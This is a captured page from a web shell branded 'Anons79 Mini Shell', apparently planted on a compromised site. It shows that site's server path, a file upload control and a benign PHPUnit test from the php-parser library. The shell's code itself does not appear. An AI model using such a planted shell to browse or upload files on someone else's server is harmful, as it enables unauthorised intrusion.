Anons79 Mini Shell

Directory : /home/proudlyafrican/www/vendor/nikic/php-parser/test/PhpParser/ErrorHandler/
Upload File :
Current File : /home/proudlyafrican/www/vendor/nikic/php-parser/test/PhpParser/ErrorHandler/ThrowingTest.php

<?php

namespace PhpParser\ErrorHandler;

use PhpParser\Error;

class ThrowingTest extends \PHPUnit_Framework_TestCase {
    /**
     * @expectedException \PhpParser\Error
     * @expectedExceptionMessage Test
     */
    public function testHandleError() {
        $errorHandler = new Throwing();
        $errorHandler->handleError(new Error('Test'));
    }
}

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]